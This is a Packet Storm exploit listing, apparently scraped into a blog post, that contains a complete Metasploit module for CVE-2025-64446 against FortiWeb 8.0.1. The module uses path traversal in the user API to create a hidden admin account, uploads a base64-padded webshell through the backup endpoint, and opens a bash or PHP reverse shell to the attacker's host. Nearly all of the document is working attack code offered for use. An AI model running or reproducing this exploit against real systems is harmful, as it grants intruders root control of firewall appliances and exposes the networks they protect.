{“lastseen”:”2026-04-23T16:47:37″,”description”:”This Metasploit module targets a critical remote code execution vulnerability in FortiWeb’s management interface by chaining multiple weaknesses. It goes from authentication bypass to path traversal to arbitrary file upload to remote code execution…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219673″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64446″],”sourceData”:”==================================================================================================================================\\n | # Title : FortiWeb 8.0.1 Authentication Bypass + File Upload RCE Metasploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.fortinet.com |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit module targets a critical Remote Code Execution vulnerability in FortiWeb\u2019s (CVE-2025-64446) management interface by chaining multiple weaknesses:\\n \\n Authentication Bypass \u2192 Path Traversal \u2192 Arbitrary File Upload \u2192 Remote Code Execution (root)\\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘FortiWeb Remote Code Execution (CVE-2025-64446)’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a critical vulnerability in FortiWeb management interface\\n that combines Authentication Bypass, Path Traversal, and Arbitrary File Upload\\n to achieve Remote Code Execution as root.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-64446’]\\n ],\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_X86, ARCH_X64],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux (Reverse Shell)’,\\n {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :linux_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n \\n register_options([\\n Opt::RPORT(8443),\\n OptBool.new(‘SSL’, [true, ‘Use SSL\/TLS’, true]),\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘USERNAME’, [false, ‘Temporary admin username’, ‘pwnedadmin’]),\\n OptString.new(‘PASSWORD’, [false, ‘Temporary admin password’, ‘Pwned123!’]),\\n OptString.new(‘WEBSHELL_PATH’, [false, ‘Webshell path’, ‘\/pwned.dat’])\\n ])\\n \\n register_advanced_options([\\n OptInt.new(‘SHELL_TIMEOUT’, [true, ‘Time to wait for shell callback’, 15])\\n ])\\n end\\n \\n def check\\n print_status(\\”Checking if target is vulnerable…\\”)\\n \\n test_username = Rex::Text.rand_text_alpha(8)\\n test_password = Rex::Text.rand_text_alpha(12)\\n \\n if create_admin_user(test_username, test_password)\\n delete_admin_user(test_username)\\n return Exploit::CheckCode::Vulnerable\\n end\\n \\n Exploit::CheckCode::Safe\\n end\\n \\n def exploit\\n print_status(\\”Starting exploitation against #{peer}\\”)\\n \\n username = datastore[‘USERNAME’]\\n password = datastore[‘PASSWORD’]\\n \\n unless create_admin_user(username, password)\\n fail_with(Failure::NotVulnerable, \\”Failed to create admin user\\”)\\n end\\n \\n unless login_admin(username, password)\\n fail_with(Failure::UnexpectedReply, \\”Login failed\\”)\\n end\\n \\n webshell_path = upload_webshell\\n fail_with(Failure::UnexpectedReply, \\”Webshell upload failed\\”) if webshell_path.nil?\\n \\n register_files_for_cleanup(webshell_path)\\n \\n trigger_shell(webshell_path)\\n delete_admin_user(username)\\n \\n Rex.sleep(datastore[‘SHELL_TIMEOUT’])\\n end\\n \\n private\\n \\n def create_admin_user(username, password)\\n payload = {\\n \\”..\/..\/mkey\\” =\\u003e username,\\n \\”password\\” =\\u003e password,\\n \\”isadmin\\” =\\u003e \\”1\\”,\\n \\”status\\” =\\u003e \\”enable\\”\\n }\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v2.0\/user\/local.add’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload.to_json\\n })\\n \\n res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(‘success’)\\n rescue\\n false\\n end\\n \\n def login_admin(username, password)\\n payload = {\\n \\”username\\” =\\u003e username,\\n \\”password\\” =\\u003e password\\n }\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v2.0\/login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload.to_json\\n })\\n \\n res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(‘success’)\\n rescue\\n false\\n end\\n \\n def upload_webshell\\n shell_code = generate_payload\\n b64_shell = Rex::Text.encode_base64(shell_code) + \\”AAA==\\”\\n \\n data = Rex::MIME::Message.new\\n data.add_part(\\n b64_shell,\\n ‘application\/octet-stream’,\\n nil,\\n \\”form-data; name=\\\\\\”upload-file\\\\\\”; filename=\\\\\\”#{Rex::Text.rand_text_alpha(8)}.dat\\\\\\”\\”\\n )\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v2.0\/system\/maintenance\/backup’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.boundary}\\”,\\n ‘data’ =\\u003e data.to_s\\n })\\n \\n return datastore[‘WEBSHELL_PATH’] if res \\u0026\\u0026 res.code == 200\\n \\n nil\\n rescue\\n nil\\n end\\n \\n def generate_payload\\n case target[‘Type’]\\n when :linux_cmd\\n p = payload.encoded\\n return p if p \\u0026\\u0026 !p.to_s.empty?\\n \\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/#{lhost}\/#{lport} 0\\u003e\\u00261’\\”\\n \\n when :unix_cmd\\n return payload.encoded\\n \\n else\\n return %Q|\\u003c?php system(\\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/#{lhost}\/#{lport} 0\\u003e\\u00261’\\”); ?\\u003e|\\n end\\n end\\n \\n def trigger_shell(webshell_path)\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e webshell_path\\n }, datastore[‘SHELL_TIMEOUT’])\\n true\\n rescue\\n true\\n end\\n \\n def delete_admin_user(username)\\n payload = {\\n \\”..\/..\/mkey\\” =\\u003e username\\n }\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v2.0\/user\/local.delete’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload.to_json\\n })\\n \\n res \\u0026\\u0026 res.code == 200\\n rescue\\n false\\n end\\n \\n def lhost\\n datastore[‘LHOST’]\\n end\\n \\n def lport\\n datastore[‘LPORT’]\\n end\\n \\n def peer\\n \\”#{rhost}:#{rport}\\”\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219673″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219673\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-23T16:47:37″,”description”:”This Metasploit module targets a critical remote code execution vulnerability in FortiWeb’s management interface by chaining multiple weaknesses. It goes from authentication bypass to path…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-48968","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n